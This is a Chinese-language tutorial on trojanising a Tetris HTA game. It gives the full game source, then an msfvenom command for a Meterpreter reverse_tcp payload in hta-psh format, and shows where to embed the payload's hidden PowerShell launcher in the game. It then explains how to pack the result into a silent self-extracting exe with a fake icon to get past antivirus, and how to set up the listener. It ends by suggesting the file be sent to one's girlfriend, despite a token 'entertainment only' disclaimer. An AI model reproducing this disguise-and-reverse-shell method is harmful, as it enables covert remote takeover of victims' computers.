注:免责申明,该方法只是用来娱乐,切勿做任何违法行为。
一、主要步骤:
1.制作一个hta(http application)游戏,文中用的是俄罗斯方块
2.用msf生成一个hta-psh 嵌入到hta游戏里面
3.用rar压缩文件把hta压缩成一个自动解压的exe文件,并自定义一个程序图标(安全,过杀软)
最终效果如下:
开始:
1.制作一个hta游戏,俄罗斯方块,hta代码如下:(也可以找其他游戏替代)
将下列代码保存为后缀为hta文件,打开看看能不能运行,然后继续….
<HTML>
<HEAD>
<title>俄罗斯游戏</title>
<script>window.resizeTo(410,450)</script>
<style>
<!--
.MB
{
BACKGROUND-COLOR: firebrick;
CURSOR: default;
HEIGHT: 22px;
WIDTH: 22px
}
.SB
{
BACKGROUND-COLOR: slategray;
CURSOR: default;
HEIGHT: 22px;
WIDTH: 22px
}
.BK
{
BACKGROUND-COLOR: white;
CURSOR: default;
HEIGHT: 22px;
WIDTH: 22px
}
.GT
{
BORDER-BOTTOM: deepskyblue thin solid;
BORDER-LEFT: deepskyblue thin solid;
BORDER-RIGHT: deepskyblue thin solid;
BORDER-TOP: deepskyblue thin solid;
CURSOR: default
}
-->
</style>
<script>
<!--
var BX=new Array(4);
var BY=new Array(4);
var PX=new Array(4);
var PY=new Array(4);
var mTimer
var firstView
var gameState = 0;
function beginGame()
{
gameState=0;
speed=1;
outTime=1100-speed*100;
score=0;
if(gameState!=0)return;
firstView=true;
for(j=0;j<16;j++)
for(i=0;i<10;i++)
setClass(i,j,"BK");
randBar();
gameState=1;
Play.disabled=true;
window.clearInterval(mTimer);
mTimer=window.setInterval("moveBar()",outTime);
}
function keyControl()
{
if(gameState!=1)return;
switch(event.keyCode){
case 37:{ //left
for(i=0;i<4;i++)if(BX[i]==0)return;
for(i=0;i<4;i++)if(getClass(BX[i]-1,BY[i])=="SB")return;
for(i=0;i<4;i++)setClass(BX[i],BY[i],"BK");
for(i=0;i<4;i++)BX[i]=BX[i]-1;
for(i=0;i<4;i++)setClass(BX[i],BY[i],"MB");
break;}
case 38:{ //up
var preMBarX=new Array(4);
var preMBarY=new Array(4);
var cx=Math.round((BX[0]+BX[1]+BX[2]+BX[3])/4);
var cy=Math.round((BY[0]+BY[1]+BY[2]+BY[3])/4);
for(i=0;i<4;i++){
preMBarX[i]=Math.round(cx-cy+BY[i]);
preMBarY[i]=Math.round(cx+cy-BX[i]);
if(preMBarX[i]<0 || preMBarX[i]>9 || preMBarY[i]<0 || preMBarY[i]>15)return;
if(getClass(preMBarX[i],preMBarY[i])=="SB")return;
}
for(i=0;i<4;i++)setClass(BX[i],BY[i],"BK");
for(i=0;i<4;i++){
BX[i]=preMBarX[i];
BY[i]=preMBarY[i];
}
for(i=0;i<4;i++)setClass(BX[i],BY[i],"MB");
break;}
case 39:{ //right
for(i=0;i<4;i++)if(BX[i]==9)return;
for(i=0;i<4;i++)if(getClass(BX[i]+1,BY[i])=="SB")return;
for(i=0;i<4;i++)setClass(BX[i],BY[i],"BK");
for(i=0;i<4;i++)BX[i]=BX[i]+1;
for(i=0;i<4;i++)setClass(BX[i],BY[i],"MB");
break;}
case 40:{ //down
moveBar();
break;}
}
}
function delLine()
{
for(i=0;i<4;i++)setClass(BX[i],BY[i],"SB");
for(j=0;j<16;j++){
dLine=true;
for(i=0;i<10;i++){
if(getClass(i,j)!="SB"){
dLine=false;
break;
}
}
if(dLine){
score=score+100;
for(k=j;k>0;k--)
for(l=0;l<10;l++)
setClass(l,k,getClass(l,k-1));
for(l=0;l<10;l++)setClass(l,0,"BK");
}
}
randBar();
speed=Math.floor(score/3000)+1;
outTime=1100-speed*100;
scoreBar.innerHTML="得分 : " + score;
speedBar.innerHTML="速度 : " + speed;
window.clearInterval(mTimer);
mTimer=window.setInterval("moveBar()",outTime);
}
function getClass(x,y){return GameBar.children[y].children[x].className;}
function setClass(x,y,cName){GameBar.children[y].children[x].className=cName;}
function moveBar()
{
if(gameState!=1)return;
dropLine=true;
for(i=0;i<4;i++)if(BY[i]==15)dropLine=false;
if(dropLine)for(i=0;i<4;i++)if(getClass(BX[i],BY[i]+1)=="SB")dropLine=false;
if(!dropLine){
window.clearInterval(mTimer);
delLine();
return;
}
for(i=0;i<4;i++)setClass(BX[i],BY[i],"BK");
for(i=0;i<4;i++)BY[i]=BY[i]+1;
for(i=0;i<4;i++)setClass(BX[i],BY[i],"MB");
}
function pauseGame()
{
if(gameState==0)return;
if(event.srcElement.value=="Pause"){
gameState=2;
event.srcElement.value="Continue";
window.clearInterval(mTimer);
}
else{
gameState=1;
event.srcElement.value="Pause";
mTimer=window.setInterval("moveBar()",outTime);
}
}
function fMnu(){return false;}
document.oncontextmenu=fMnu;
function preview()
{
if(previewWnd.style.display!="none")
previewWnd.style.display="none";
else
previewWnd.style.display="block";
}
function replayGame()
{
if(gameState!=1)return;
if(!confirm("确定重新开始游戏?"))return;
gameState=0;
window.clearInterval(mTimer);
beginGame();
}
function randBar()
{
randNum=Math.floor(Math.random()*20)+1;
if(!firstView)
for(i=0;i<4;i++){
BX[i]=PX[i];
BY[i]=PY[i];
}
switch(randNum){
case 1:{
PX[0]=4;
PY[0]=0;
PX[1]=4;
PY[1]=1;
PX[2]=5;
PY[2]=1;
PX[3]=6;
PY[3]=1;
break;}
case 2:{
PX[0]=4;
PY[0]=0;
PX[1]=5;
PY[1]=0;
PX[2]=4;
PY[2]=1;
PX[3]=4;
PY[3]=2;
break;}
case 3:{
PX[0]=4;
PY[0]=0;
PX[1]=5;
PY[1]=0;
PX[2]=6;
PY[2]=0;
PX[3]=6;
PY[3]=1;
break;}
case 4:{
PX[0]=5;
PY[0]=0;
PX[1]=5;
PY[1]=1;
PX[2]=5;
PY[2]=2;
PX[3]=4;
PY[3]=2;
break;}
case 5:{
PX[0]=6;
PY[0]=0;
PX[1]=6;
PY[1]=1;
PX[2]=4;
PY[2]=1;
PX[3]=5;
PY[3]=1;
break;}
case 6:{
PX[0]=4;
PY[0]=0;
PX[1]=4;
PY[1]=1;
PX[2]=4;
PY[2]=2;
PX[3]=5;
PY[3]=2;
break;}
case 7:{
PX[0]=4;
PY[0]=0;
PX[1]=4;
PY[1]=1;
PX[2]=5;
PY[2]=0;
PX[3]=6;
PY[3]=0;
break;}
case 8:{
PX[0]=4;
PY[0]=0;
PX[1]=5;
PY[1]=0;
PX[2]=5;
PY[2]=1;
PX[3]=5;
PY[3]=2;
break;}
case 9:{
PX[0]=4;
PY[0]=0;
PX[1]=5;
PY[1]=0;
PX[2]=5;
PY[2]=1;
PX[3]=6;
PY[3]=1;
break;}
case 10:{
PX[0]=5;
PY[0]=0;
PX[1]=5;
PY[1]=1;
PX[2]=4;
PY[2]=1;
PX[3]=4;
PY[3]=2;
break;}
case 11:{
PX[0]=4;
PY[0]=1;
PX[1]=5;
PY[1]=1;
PX[2]=5;
PY[2]=0;
PX[3]=6;
PY[3]=0;
break;}
case 12:{
PX[0]=4;
PY[0]=0;
PX[1]=4;
PY[1]=1;
PX[2]=5;
PY[2]=1;
PX[3]=5;
PY[3]=2;
break;}
case 13:{
PX[0]=4;
PY[0]=0;
PX[1]=5;
PY[1]=0;
PX[2]=6;
PY[2]=0;
PX[3]=5;
PY[3]=1;
break;}
case 14:{
PX[0]=4;
PY[0]=0;
PX[1]=4;
PY[1]=1;
PX[2]=4;
PY[2]=2;
PX[3]=5;
PY[3]=1;
break;}
case 15:{
PX[0]=5;
PY[0]=0;
PX[1]=5;
PY[1]=1;
PX[2]=4;
PY[2]=1;
PX[3]=6;
PY[3]=1;
break;}
case 16:{
PX[0]=5;
PY[0]=0;
PX[1]=5;
PY[1]=1;
PX[2]=5;
PY[2]=2;
PX[3]=4;
PY[3]=1;
break;}
case 17:{
PX[0]=4;
PY[0]=0;
PX[1]=5;
PY[1]=0;
PX[2]=4;
PY[2]=1;
PX[3]=5;
PY[3]=1;
break;}
case 18:{
PX[0]=4;
PY[0]=0;
PX[1]=5;
PY[1]=0;
PX[2]=4;
PY[2]=1;
PX[3]=5;
PY[3]=1;
break;}
case 19:{
PX[0]=3;
PY[0]=0;
PX[1]=4;
PY[1]=0;
PX[2]=5;
PY[2]=0;
PX[3]=6;
PY[3]=0;
break;}
case 20:{
PX[0]=5;
PY[0]=0;
PX[1]=5;
PY[1]=1;
PX[2]=5;
PY[2]=2;
PX[3]=5;
PY[3]=3;
break;}
}
if(firstView){
firstView=false;
randBar();
return;
}
for(i=0;i<4;i++){
for(j=0;j<4;j++){
previewBar.children[j].children[i].className="BK";
}
}
for(i=0;i<4;i++)previewBar.children[PY[i]].children[PX[i]-3].className="MB";
for(i=0;i<4;i++){
if(getClass(BX[i],BY[i])!="BK"){
alert("游戏结束!");
window.clearInterval(mTimer);
Play.disabled=false;
gameState=0;
return;
}
}
for(i=0;i<4;i++)setClass(BX[i],BY[i],"MB");
}
// -->
</script>
</HEAD>
<BODY bgcolor="#EAF0F8" onkeydown="return keyControl();" topmargin="10" leftmargin="10" rightmargin="10" bottommargin="0" scroll=no>
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="100%"><tr><td width="100%" height="100%" align="center">
<table cellspacing=2 cellpadding=0 class=gt border=0 bordercolor="#EAF0F8" bgcolor="#EAF0F8">
<tr>
<td valign="top">
<table cellspacing=0 cellpadding=0 class=gt border=1 bordercolor="#EAF0F8" style="">
<Tbody id=GameBar>
<tr><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK>
</td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr>
</tbody>
</table>
</td>
<td valign="top" align="center" style="padding: 10 10 0 10" bgcolor="#466285">
<table cellspacing=0 cellpadding=0 border=0>
<tr><td><font size=5 color=red face=consolas>得分</font></td></tr>
</table>
<table id="previewWnd" cellspacing=0 cellpadding=0 class=gt border=1 bordercolor="#EAF0F8" bgcolor="#EAF0F8" style="margin-top:15">
<Tbody id="previewBar">
<tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr>
</tbody>
</table>
<table cellspacing=3 cellpadding=0 border=0 style="margin-top:15">
<tr><td><input type=button id="Play" style="font-family:Tahoma; font-size:9pt; width:100px" value="开始" onclick="return beginGame();"></td></tr>
<tr><td><input type=button id="Pause" style="font-family:Tahoma; font-size:9pt; width:100px" value="暂停" onclick="return pauseGame();"></td></tr>
<tr><td><input type=button id="Preview" style="font-family:Tahoma; font-size:9pt; width:100px" value="下一个预览" onclick="preview();"></td></tr>
<tr><td><input type=button id="Replay" style="font-family:Tahoma; font-size:9pt; width:100px" value="重新开始" onclick="replayGame();"></td></tr>
</table>
<table cellspacing=3 cellpadding=0 border=0 style="font-family:Tahoma; font-size:9pt; font-weight: bold; margin-top:10">
<tr><td id=scoreBar style="color:#FFFFFF">得分 : 0</td></tr>
<tr><td id=speedBar style="color:#FFFFFF">游戏速度 : 1</td></tr>
</table>
</td>
</tr>
</table>
</td></tr></table>
</BODY>
</HTML>
<script>
function unSel()
{
document.execCommand("Unselect");
window.setTimeout("unSel()",100);
}
unSel();
</script>2.用msf生成一个hta-psh 嵌入到hta游戏里面
使用msfconsole -n进入msf(最新版msf需要进入后才能使用msfvenom命令)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f hta-psh >>shell.txt
用msfvenom生成的大概shell样式如下:
<script language="VBScript">
window.moveTo -4000, -4000
Set rNztB = CreateObject("Wscript.Shell")
Set jGMUzylusp = CreateObject("Scripting.FileSystemObject")
For each path in Split(rNztB.ExpandEnvironmentStrings("%PSModulePath%"),";")
If jGMUzylusp.FileExists(path + "\..\powershell.exe") Then
rNztB.Run "powershell.exe -nop -w hidden -e aQBmACgAWw.... 省略一万个字符
Exit For
End If
Next
window.close()
</script>然后稍作调整,把没必要的代码去掉嵌入到hta俄罗斯方块里
最终如下:
<script language="VBScript">
Set rNztB = CreateObject("Wscript.Shell")
Set jGMUzylusp = CreateObject("Scripting.FileSystemObject")
For each path in Split(rNztB.ExpandEnvironmentStrings("%PSModulePath%"),";")
If jGMUzylusp.FileExists(path + "\..\powershell.exe") Then
rNztB.Run "powershell.exe -nop -w hidden -e aQBmACgAWw.... 省略一万个字符
Exit For
End If
Next
</script>把最终代码放入hta如下位置即可
<table cellspacing=3 cellpadding=0 border=0 style="margin-top:15">
<tr><td><input type=button id="Play" style="font-family:Tahoma; font-size:9pt; width:100px" value="开始" onclick="return beginGame();"></td></tr>
//hta-psh shell段
<script language="VBScript">
Set rNztB = CreateObject("Wscript.Shell")
Set jGMUzylusp = CreateObject("Scripting.FileSystemObject")
For each path in Split(rNztB.ExpandEnvironmentStrings("%PSModulePath%"),";")
If jGMUzylusp.FileExists(path + "\..\powershell.exe") Then
rNztB.Run "powershell.exe -nop -w hidden -e aQBmACgAWw.... 省略一万个字符
Exit For
End If
Next
</script>
//hta-psh shell段
<tr><td><input type=button id="Pause" style="font-family:Tahoma; font-size:9pt; width:100px" value="暂停" onclick="return pauseGame();"></td></tr>3.用rar压缩文件把hta压缩成一个自动解压的exe文件,并自定义一个程序图标
主要步骤如下:
在windows电脑桌面新建一个rar文件—->打开rar文件把制作的hta文件拖进去—->选择自解压格式—->高级自解压选项(V)…—->常规:在选项卡的解压路径一栏填入“C:\Users\Game\“(不要双引号),其他默认—->设置:在设置选项卡安装程序的解压后运行一栏输入“C:\Users\Game\game.hta“(不要双引号),其他默认—->模式:在模式选项卡,安静模式选择“全部隐藏”—->文本和图标:在文本和图标选项卡从文件加载自解压文件图标(T)一栏,选择要伪装的游戏图标ico格式的—->更新:在更新选项卡里,更改覆盖方式一栏为跳过已经存在的文件(K)—->确定—->确定
注意:记得msf监听的时候,设置一下 set exitonsession false,运行的时候是run -j
这样子可接受多个反弹的session,并且以一个job的方式在后台运行。
然后你会在桌面上看到一个exe格式的游戏了….丢给你心爱的姑凉吧….